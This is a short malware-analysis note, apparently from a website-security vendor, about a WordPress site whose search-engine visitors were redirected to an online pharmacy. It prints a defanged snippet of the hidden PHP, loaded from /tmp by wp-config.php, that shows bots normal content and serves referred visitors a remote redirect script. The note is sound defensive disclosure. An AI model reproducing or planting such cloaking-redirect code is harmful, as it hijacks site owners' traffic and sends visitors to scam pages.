Conditional redirection to an online pharmacy store

Labs Note

During an investigation, a client reported some weird behavior from all incoming visits during their Google search engine result clicks are instantly redirected to an online pharmacy store.

This occurred with visits that were initiated by clicking on any of their indexed search results at

The malware caused all incoming visits from searches to be automatically redirected to hxxxs://pharm-bay(.) com.

After further investigation, the hacker simply hid the malicious code in an extensionless file called “log” in their tmp folder.

The malicious file was then loaded by ./wp-config.php as they had an include PHP function to load that log file.

Here is the conditional redirection rule snippet from the /tmp/logfile.

...if($content = $client->getContent()){if( (strpos($_SERVER['<strong>HTTP_USER_AGENT</strong>'], <strong>google</strong>)  !== false ) || (strpos($_SERVER['<strong>HTTP_USER_AGENT</strong>'], <strong>bot</strong>)  !== false ) ){echo $content;die;}elseif((strpos($_SERVER['<strong>HTTP_REFERER</strong>'], <strong>google</strong>)  !== false ) || (strpos($_SERVER['<strong>HTTP_REFERER</strong>'], <strong>bing</strong>)  !== false )){if($_SERVER[<strong>REQUEST_URI</strong>]!=<strong>/</strong>){?><<strong>script</strong> src=hxxp://<strong>scipton(.)com/doorways/default/script/script4.js</strong>></script><?php die;}}}...

As you can see, the malicious code is checking if the referrer is set to Google or Bing, and if so, it will serve the malicious JavaScript redirecting it to the hxxxs://pharm-bay(.)com pharmacy store.

Let us know if you see or suspect any weird behavior on your website and we will be happy to investigate and clean it for you.

You May Also Like